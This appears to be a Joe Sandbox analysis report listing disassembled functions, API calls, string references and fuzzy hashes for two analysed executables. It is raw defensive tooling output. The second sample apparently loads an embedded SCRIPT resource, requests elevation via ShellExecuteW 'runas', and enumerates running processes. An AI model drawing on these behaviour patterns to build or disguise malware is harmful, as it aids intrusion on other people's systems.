Opcode Fuzzy Hash: eb365153de8d2ca5ed530107c2831eafd85e4619d4f0304e5894fb7b6389f9cc
Instruction Fuzzy Hash: 4C810FB0909268CFCB14DFA8E584BEEBBF0BF19304F204529E845A7341D7789949CF96

Function 000246F6 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0002470A
AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00031B20,000000FF,?,00023552), ref: 00024729
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00031B20,000000FF,?,00023552), ref: 00024757
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00031B20,000000FF,?,00023552), ref: 000247B2
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00031B20,000000FF,?,00023552), ref: 000247C9

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
Opcode ID: 5c16ee9243cab403a0d6a8b235112d7a8238d4dd243b266945f5562ff3d53f57
Instruction ID: 24e61719ee299ef43957bf01856469518ab067cc29d7b2aff4d4500f21730e07
Opcode Fuzzy Hash: 5c16ee9243cab403a0d6a8b235112d7a8238d4dd243b266945f5562ff3d53f57
Instruction Fuzzy Hash: CA418D34918626DFCB61CF65E8849AAF3F9FF06310B10892AD46AD7A41DB30F944CF60

Function 0002D200 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0002D29C,00000000,?,0003B728,?,?,?,0002D1D3,00000004,InitializeCriticalSectionEx,00033740,00033748), ref: 0002D20D
GetLastError.KERNEL32(?,0002D29C,00000000,?,0003B728,?,?,?,0002D1D3,00000004,InitializeCriticalSectionEx,00033740,00033748,00000000,?,00028E2C), ref: 0002D217
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0002D23F

Strings

api-ms-, xrefs: 0002D224

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: b71cc081a7842325139a4dcfba19f2fde33afd16e7fb573ca5d5125b0190d193
Instruction ID: f7d1a135226f5e70ebe0c00525abf9ed99070e2d087d839760a17fc32e665574
Opcode Fuzzy Hash: b71cc081a7842325139a4dcfba19f2fde33afd16e7fb573ca5d5125b0190d193
Instruction Fuzzy Hash: C1E01A30684304B6EB622B60EC46B693BA8AB50B51F148461FE0CE80A1DBB5E9989684

Function 0002DCA8 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 0002DD0B

Part of subcall function 0002C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0002D6D0,?,00000000,-00000008), ref: 0002C902

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0002DF5D
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0002DFA3
GetLastError.KERNEL32 ref: 0002E046

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 86dc495b843ae93ce581df9194793f7eb3992321f2cfba65f99ffe8ac281aea0
Instruction ID: beec9dc309c982baafcb297ff2a3b6f33c519cba5b6d678a05b2bf70d4839c8d
Opcode Fuzzy Hash: 86dc495b843ae93ce581df9194793f7eb3992321f2cfba65f99ffe8ac281aea0
Instruction Fuzzy Hash: 20D17A75D002689FCF15CFA8E9C09EEBBF9EF09314F28416AE556EB251D630AD42CB50

Function 00028500 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 000285C7
___AdjustPointer.LIBCMT ref: 000285EA
___AdjustPointer.LIBCMT ref: 00028686

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 00e1842173ee7d068c937a93e1669c7b6b83a292ac769ba50488ddbefff8b015
Instruction ID: 5eed6d0b9e405f693cd78dc0ee931911f5b4c02431ef8bfd4abc0d90b3b60011
Opcode Fuzzy Hash: 00e1842173ee7d068c937a93e1669c7b6b83a292ac769ba50488ddbefff8b015
Instruction Fuzzy Hash: EC51D27A6036369FDB298F14F849BBAB7E4EF04711F14856DE90557292EB31EC40CB50

Function 0002BD28 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0002C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0002D6D0,?,00000000,-00000008), ref: 0002C902

GetLastError.KERNEL32 ref: 0002BD8C
__dosmaperr.LIBCMT ref: 0002BD93
GetLastError.KERNEL32(?,?,?,?), ref: 0002BDCD
__dosmaperr.LIBCMT ref: 0002BDD4

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: d7f769735ace37881d4954240453312d0a1bf122e2ba0fbb3243ad036fb7605d
Instruction ID: 54eefe4677cf975c23c6044d5cc6957441ff6f4a5ce37029d5c8d6ae12a79c9a
Opcode Fuzzy Hash: d7f769735ace37881d4954240453312d0a1bf122e2ba0fbb3243ad036fb7605d
Instruction Fuzzy Hash: 5021D471600226AFDB20AF66EC81DEFB7ADFF043647108819F96997111EB30EC008B91

Function 0002C2C4 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f85dcc4fec40e7a1d8654dacc1cc6afc31f21699c5c0cfedad53cb6ad2857752
Instruction ID: 3786ca4e53d7cf8c2a69319a057405de0aab944ae9e17e36c26d1e172bf8b074
Opcode Fuzzy Hash: f85dcc4fec40e7a1d8654dacc1cc6afc31f21699c5c0cfedad53cb6ad2857752
Instruction Fuzzy Hash: 9C21AE71600225AFEB60EFB5EC81DAF77A9AF053647108E15F819D7152DB31EE008BA0

Function 0002C99D Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0002C9A5

Part of subcall function 0002C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0002D6D0,?,00000000,-00000008), ref: 0002C902

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0002C9DD
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0002C9FD

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 9505a46b474ca6dabb27baadb813b61e5ef294174c1efce4ae3a78e3bc596876
Instruction ID: 2a6e2411643872b6d262c90f69c70b3a8d5a881a8489cce7e65fc4c06bc0a3ce
Opcode Fuzzy Hash: 9505a46b474ca6dabb27baadb813b61e5ef294174c1efce4ae3a78e3bc596876
Instruction Fuzzy Hash: 8C11C4E1905639BF7A21B7B1BC8DCFF299CEF553A83100065F906D2102EE248D4192B2

Function 00021E00 Relevance: 6.1, APIs: 4, Instructions: 53threadCOMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 00021E2D
GetCurrentThreadId.KERNEL32 ref: 00021E3B
std::_Throw_Cpp_error.LIBCPMT ref: 00021E54
std::_Throw_Cpp_error.LIBCPMT ref: 00021E93

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$CurrentThread
String ID:
API String ID: 2261580123-0
Opcode ID: 7526cc61ad39bf6711c019d22a808e718543b79924697afa505800637260ecf1
Instruction ID: 9b9805f8beb9767cb4246bab81791bd9e11691841fb04f9090197f8e87b87e45
Opcode Fuzzy Hash: 7526cc61ad39bf6711c019d22a808e718543b79924697afa505800637260ecf1
Instruction Fuzzy Hash: 6421B6B4E042199FCB04EFA8E5857ADFBF1EF58300F02845DE859A7392D7389A41CB51

Function 0002FD00 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0002F4A1,00000000,00000001,00000000,?,?,0002E09A,?,00000000,00000000), ref: 0002FD17
GetLastError.KERNEL32(?,0002F4A1,00000000,00000001,00000000,?,?,0002E09A,?,00000000,00000000,?,?,?,0002D9E0,00000000), ref: 0002FD23

Part of subcall function 0002FD74: CloseHandle.KERNEL32(FFFFFFFE,0002FD33,?,0002F4A1,00000000,00000001,00000000,?,?,0002E09A,?,00000000,00000000,?,?), ref: 0002FD84

___initconout.LIBCMT ref: 0002FD33

Part of subcall function 0002FD55: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0002FCF1,0002F48E,?,?,0002E09A,?,00000000,00000000,?), ref: 0002FD68

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0002F4A1,00000000,00000001,00000000,?,?,0002E09A,?,00000000,00000000,?), ref: 0002FD48

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: a1f27615ce713286d09159116959e50842ae6dad6e12f55abb5c968d38dbd714
Instruction ID: 7fb5b687f5bf5c210566959275700a7ffe0851ea5c14deb9882dc94e104a50e2
Opcode Fuzzy Hash: a1f27615ce713286d09159116959e50842ae6dad6e12f55abb5c968d38dbd714
Instruction Fuzzy Hash: A9F03736500226BFDF531F91EC08A9A3F7BFB097E1B418470FA0985130DA3298609B91

Function 00024F01 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00024F13
GetCurrentThreadId.KERNEL32 ref: 00024F22
GetCurrentProcessId.KERNEL32 ref: 00024F2B
QueryPerformanceCounter.KERNEL32(?), ref: 00024F38

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: cde9f9fa6dc10d2d5f37245b528291be7da13ed05d5975e638a5317793e5ef89
Instruction ID: d9341af45ec3da5bc707ab0f180603714af56479ec77f1463bfae48e3cea246b
Opcode Fuzzy Hash: cde9f9fa6dc10d2d5f37245b528291be7da13ed05d5975e638a5317793e5ef89
Instruction Fuzzy Hash: E4F0B234C0020CEBDB45DBB4CA88A8EBBF8FF1C204B918995E412E7110EB34AB489F50

Function 00028BFD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00028AFE,?,?,00000000,00000000,00000000,?), ref: 00028C22

Strings

MOC, xrefs: 00028C34
RCC, xrefs: 00028C3C

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 89fd01799b3575690a56803ee50de53d61687b1c2f4ffeec9c8f3afb455b518d
Instruction ID: 9b1d4216aeb655e64cdee1450c4f65ed3d191d90764fcd0bcc7ad2c93ae2a2ba
Opcode Fuzzy Hash: 89fd01799b3575690a56803ee50de53d61687b1c2f4ffeec9c8f3afb455b518d
Instruction Fuzzy Hash: 1D41AC75901229EFCF16DF94ED81AEEBBB5FF48300F288169F908A7252D7359950CB50

Function 00431B93 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00431BE1
GetSystemMetrics.USER32 ref: 00431BF0

Strings

, xrefs: 00431CC4

Memory Dump Source

Source File: 00000008.00000002.2558796799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PK13K1G.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: c1a8905eb2375b169aeb0609964f5fd042fa87aa23ce9218e4478d4ff63652ff
Instruction ID: ceab09ed21d3a96c00a12ee0b2696c0f71d18db1333b208089558951d862b571
Opcode Fuzzy Hash: c1a8905eb2375b169aeb0609964f5fd042fa87aa23ce9218e4478d4ff63652ff
Instruction Fuzzy Hash: EC5193B4E142098FDB40EFACD985A9EBBF0BB88300F108569E459E7354D734AD49CF56

Function 00028469 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 000286E0

Strings

csm, xrefs: 00028702
csm, xrefs: 00028773

Memory Dump Source

Source File: 00000008.00000002.2557668509.0000000000021000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00020000, based on PE: true

Associated: 00000008.00000002.2557545083.0000000000020000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558032872.0000000000032000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558280024.000000000003A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558449701.000000000003D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2558549615.0000000000040000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_20000_PK13K1G.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: deeb9db8472cdeb0e9f9ad70e347dc14fc5312916d6f6c8ba62e70ef94efddb2
Instruction ID: c47ab671a9d238ba7db9b85c68195acabd5f2de7ea58071db45e3c0657eb5c36
Opcode Fuzzy Hash: deeb9db8472cdeb0e9f9ad70e347dc14fc5312916d6f6c8ba62e70ef94efddb2
Instruction Fuzzy Hash: FB31E73E40A239DBCF668F50EC449AABBA6FF08315B38C559FC5449221DB32CC61DB91

Analysis Process: 8ed1a1ded0.exePID: 7072, Parent PID: 3688COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.3%
Total number of Nodes:	1727
Total number of Limit Nodes:	47

Executed Functions

Function 00FD42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00FD430D

Part of subcall function 00FD6B57: _wcslen.LIBCMT ref: 00FD6B6A

GetCurrentProcess.KERNEL32(?,0106CB64,00000000,?,?), ref: 00FD4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00FD4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00FD4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FD4466
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00FD4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 00FD447B
GetSystemInfo.KERNEL32(?,?,?), ref: 00FD44A0

Strings

|O, xrefs: 010136F8
kernel32.dll, xrefs: 00FD444F
GetNativeSystemInfo, xrefs: 00FD4460

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 3f68ab76f19d29fa15df96b9aa85d74026a89ae2d2080f6abbd35726425b6621
Instruction ID: ca300ab538dcda7dbadbaa2887573ff95459bdb70cb7c037a97528c6edc60007
Opcode Fuzzy Hash: 3f68ab76f19d29fa15df96b9aa85d74026a89ae2d2080f6abbd35726425b6621
Instruction Fuzzy Hash: 54A17E3790EAC0DFC732CF6974402997EE57B26250F88D89AD4C1ABB0ED63E4548DB61

Function 00FD42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00FD50AA,?,?,00000000,00000000), ref: 00FD42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FD50AA,?,?,00000000,00000000), ref: 00FD42C9
LoadResource.KERNEL32(?,00000000,?,?,00FD50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FD4F20), ref: 010135BE
SizeofResource.KERNEL32(?,00000000,?,?,00FD50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FD4F20), ref: 010135D3
LockResource.KERNEL32(00FD50AA,?,?,00FD50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FD4F20,?), ref: 010135E6

Strings

SCRIPT, xrefs: 00FD42BF

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 779150f581d366f3b762bac67e75dbe809d34fe908aba790a38d95ecd3026e02
Instruction ID: 9a20dce47b81f62748ad2d0d4817700ed697be4a802990822c8061a239cd0dd6
Opcode Fuzzy Hash: 779150f581d366f3b762bac67e75dbe809d34fe908aba790a38d95ecd3026e02
Instruction Fuzzy Hash: 29117C71200701BFE7218B65DD48F277BBAEBC5B62F14416AF886D7254DB76E8009670

Function 01012BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00FD2B6B

Part of subcall function 00FD3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010A1418,?,00FD2E7F,?,?,?,00000000), ref: 00FD3A78

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,01092224), ref: 01012C10
ShellExecuteW.SHELL32(00000000,?,?,01092224), ref: 01012C17

Strings

runas, xrefs: 01012C0B

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 500173bfaa2194f618753b1728d0c3ddf5f08db9e76c31f0308d770eb057c330
Instruction ID: 2195e01886312c64bc9bf9f35f8201d0d7d9f5d7834452a629c22947a2c6263f
Opcode Fuzzy Hash: 500173bfaa2194f618753b1728d0c3ddf5f08db9e76c31f0308d770eb057c330
Instruction Fuzzy Hash: 6911D2316082016AC715FF64DD5196EBBA6ABA1750F4C041FF2C2462A2CF7D8A09B752

Function 0103D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0103D501
Process32FirstW.KERNEL32(00000000,?), ref: 0103D50F
Process32NextW.KERNEL32(00000000,?), ref: 0103D52F
CloseHandle.KERNEL32(00000000), ref: 0103D5DC

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
